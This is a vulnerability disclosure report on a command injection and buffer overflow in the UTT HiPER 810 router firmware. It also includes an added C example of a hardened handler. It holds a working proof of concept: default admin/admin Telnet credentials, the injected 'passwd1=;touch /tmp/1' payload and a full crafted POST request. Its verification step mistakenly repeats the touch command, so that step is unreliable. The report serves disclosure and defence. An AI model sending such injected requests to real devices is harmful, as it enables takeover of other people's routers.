Vulnerability Disclosure Report: Remote Command Injection in UTT HiPER 810
- General Information
Vendor: UTT (艾泰)
Vendor Website: http://www.utt.com.cn/
Affected Product: HiPER 810
Affected Firmware Version: nv810v4v1.7.4-141218
Vulnerability Type: OS Command Injection
In the setSysAdm function, user input from the passwd1 parameter is assigned to the variable Var.
Memory Corruption: At line 14, strcpy is used without boundary checks, leading to a buffer overflow.
Command Injection: More critically, at line 19, Var is directly passed to doSystem:
doSystem((int)"chpasswd.sh %s %s", "admin", Var);
To successfully reproduce the Remote Command Execution (RCE) vulnerability, follow these steps:
Establish Management Connection: First, ensure you can access the device's management interface. You need to log in via Telnet to monitor the execution results.
Command: telnet 192.168.1.1 60023
Credentials: admin / admin
Trigger the Exploit: While the session is active, send the following crafted POST request to the /goform/formUser endpoint. The payload uses a semicolon to inject the touch command.
Payload: passwd1=;touch /tmp/1
Verify Execution: In your Telnet terminal, check the /tmp directory to confirm the command was executed.
Command: touch /tmp/1
Expected Result: The file 1 should be present, proving arbitrary command execution.

The API that invokes the function
The handler reads the usernameold and username parameters and checks them; only if both equal admin does it enter the setSysAdm function.
As illustrated in the IDA Pro pseudocode, the variable Var is retrieved from the user-controlled parameter passwd1. Critically, at line 19 this variable is passed directly into a system-level execution function: doSystem((int)"chpasswd.sh %s %s", "admin", Var); Because the application performs no sanitization or filtering of shell metacharacters (such as the semicolon ;), an attacker can terminate the intended command and append arbitrary OS commands. This flaw results in Remote Command Execution (RCE), a significantly higher risk than the buffer overflow alone, which would yield at most a Denial of Service (DoS).
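As an added illustration that is not part of the original report, the following C shows the string the original doSystem call hands to the shell for the payload above, next to a hardened replacement for the same handler (allow-list validation, bounded copy, and an argv for execve so no shell ever parses the value). PASSWD_MAX, the script path and the function names are assumptions, not values from the firmware.

```c
#include <stdio.h>
#include <string.h>

/* Assumed bound for the password buffer; the report does not give the real size. */
#define PASSWD_MAX 32

/* The original pattern: the unvalidated value is formatted into a shell command.
 * This only builds the string so it can be inspected; nothing is executed. */
int shell_string_as_built(const char *passwd1, char *out, size_t outlen) {
    char var[PASSWD_MAX];
    snprintf(var, sizeof var, "%s", passwd1);   /* bounded here; the firmware used strcpy */
    return snprintf(out, outlen, "chpasswd.sh %s %s", "admin", var);
}

/* Allow-list check: printable ASCII only, none of the characters a shell treats specially. */
int passwd_is_safe(const char *s) {
    size_t n = strlen(s);
    if (n == 0 || n >= PASSWD_MAX) return 0;           /* empty or would not fit the buffer */
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)s[i];
        if (c < 0x21 || c > 0x7e) return 0;            /* whitespace, control, non-ASCII */
        if (strchr(";&|`$<>()[]{}\\\"'*?!~#", c)) return 0; /* shell metacharacters */
    }
    return 1;
}

/* Hardened handler: validate first, copy with a bound, then build an argv for
 * fork() + execve() so the value is a single argument and is never re-parsed.
 * Returns 0 when argv is ready, -1 when the input is rejected. */
int hardened_chpasswd_argv(const char *passwd1, char *var, size_t varlen, char *argv[4]) {
    if (varlen < PASSWD_MAX || !passwd_is_safe(passwd1)) return -1;
    snprintf(var, varlen, "%s", passwd1);   /* replaces the unchecked strcpy */
    argv[0] = "/bin/chpasswd.sh";           /* assumed path to the script */
    argv[1] = "admin";
    argv[2] = var;                          /* one argv element, whatever it contains */
    argv[3] = NULL;
    return 0;                               /* caller: execve(argv[0], argv, envp) */
}
```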

Click this tab, capture the resulting request, and modify it as shown below.
PoC attack
Construct the following request and send it.
POST /goform/formUser HTTP/1.1
Host: 192.168.1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:147.0) Gecko/20100101 Firefox/147.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.9,zh-TW;q=0.8,zh-HK;q=0.7,en-US;q=0.6,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 54
Origin: http://192.168.1.1
Authorization: Digest username="admin", realm="UTT", nonce="5a4dc864ac29e7430d3a36a747de635b", uri="/User_edit.asp", algorithm=MD5, response="adebefb5e52232691518627e42a27154", opaque="5ccc069c403ebaf9f0171e9517f40e41", qop=auth, nc=000000b4, cnonce="99c0d14a811f912b"
Connection: keep-alive
Referer: http://192.168.1.1/User.asp
Cookie: language=zhcn; utt_bw_rdevType=
Upgrade-Insecure-Requests: 1
Priority: u=0, i
usernameold=admin&username=admin&passwd1=;touch /tmp/1